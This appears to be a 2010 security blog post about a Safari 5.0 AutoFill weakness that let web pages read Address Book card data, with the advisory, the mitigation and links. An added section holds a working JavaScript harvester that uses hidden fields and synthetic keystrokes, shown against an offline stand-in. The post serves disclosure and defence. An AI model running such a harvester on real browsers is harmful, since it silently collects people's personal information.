Archive for July, 2010

0day: Apple Safari AutoFill

Description

Jeremiah Grossman has discovered a weakness in Apple Safari, which can be exploited by malicious people to disclose potentially sensitive information.

The weakness is caused by the AutoFill feature being enabled by default to use information from the user's personal Address Book card (the "Using info from my Address Book card" option). A specially crafted web page can exploit this to silently read personal information from that card: as Grossman's write-up (linked below) explains, the page creates text fields named after card attributes such as name, company, city, state, country and email (typically hidden), uses JavaScript to simulate keystrokes into them, and then uploads whatever Safari auto-populates to the attacker's server, all without the user's knowledge or interaction.

The weakness is confirmed in Safari version 5.0. Other versions may also be affected.

Impact: Exposure of sensitive information

Reference : Secunia Advisory SA40664

Solution
Disable the AutoFill feature for Address Book card information.

How? Open Safari's preferences (Safari > Preferences, or press ⌘,), select the AutoFill tab and uncheck "Using info from my Address Book card" under "AutoFill web forms". Afterwards, reloading the PoC page linked below should yield no data.

Further reading:

http://jeremiahgrossman.blogspot.com/2010/07/i-know-who-your-name-where-you-work-and.html

PoC : http://ha.ckers.org/weird/safari_autofill.html

Personal information exposed? It depends on the data; here's my browser result.
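To make the mechanism in the description concrete, here is an added illustration of the shape of such an AutoFill harvester. It is not the ha.ckers.org PoC and not Grossman's code; the field names, the use of keydown events and the constructed "vulnerable browser" stand-in (which completes a named field from a sample card on the first matching keystroke, the way Safari 5 did) are assumptions made for the example so that it can run offline under Node. In a real Safari 5 page the harvester would be called with the real document instead of the stand-in.

```javascript
// Field names matched against the Address Book "Me" card (assumed list).
const CARD_FIELDS = ["name", "company", "city", "state", "country", "email"];

// Build a hidden form, fire a synthetic keystroke into each named field and
// collect whatever the browser auto-populates. `doc` is a DOM Document in a
// browser (harvestAutofill(document)) or the stand-in below under Node.
function harvestAutofill(doc, letters = "abcdefghijklmnopqrstuvwxyz") {
  const form = doc.createElement("form");
  form.style.display = "none";               // keep the probe out of sight
  doc.body.appendChild(form);

  const leaked = {};
  for (const name of CARD_FIELDS) {
    const input = doc.createElement("input");
    input.type = "text";
    input.name = name;                       // the name is what triggers AutoFill
    form.appendChild(input);
    input.focus();
    for (const ch of letters) {              // "type" A-Z until AutoFill fires
      input.value = ch;
      input.dispatchEvent(new doc.defaultView.KeyboardEvent("keydown", { key: ch }));
      if (input.value.length > 1) break;     // more than our one key: it was filled in
    }
    if (input.value.length > 1) leaked[name] = input.value;
  }
  doc.body.removeChild(form);
  return leaked;                             // an attacker would POST this home
}

// Constructed stand-in for a Safari-5-style AutoFill engine (assumption, not
// Safari's real behaviour): a keydown in a field named after a card attribute
// whose value starts with that key completes the field from the card.
function vulnerableDocument(card) {
  class KeyboardEvent {
    constructor(type, init = {}) { this.type = type; this.key = init.key; }
  }
  const makeNode = (tag) => ({
    tag, style: {}, children: [], name: "", type: "", value: "",
    appendChild(child) { this.children.push(child); },
    removeChild(child) { this.children = this.children.filter((c) => c !== child); },
    focus() {},
    dispatchEvent(ev) {
      const fill = card[this.name];
      if (ev.type === "keydown" && fill && fill.toLowerCase().startsWith(ev.key)) {
        this.value = fill;
      }
    },
  });
  return { defaultView: { KeyboardEvent }, body: makeNode("body"), createElement: makeNode };
}

// Constructed sample "Me" card; not real data.
const SAMPLE_CARD = {
  name: "Jane Doe", company: "Example Corp", city: "Santa Clara",
  state: "CA", country: "United States", email: "jane@example.com",
};

// Run the harvester against the stand-in and return what it would exfiltrate.
function runDemo(card = SAMPLE_CARD) {
  return harvestAutofill(vulnerableDocument(card));
}

console.log(runDemo());
```

The point the stand-in makes is that nothing in the flow needs the user to type, click or even see the form: the field name alone selects which card attribute is offered, and a scripted keystroke is enough to accept it. Unchecking "Using info from my Address Book card" corresponds to the card being empty here, in which case the harvester returns nothing.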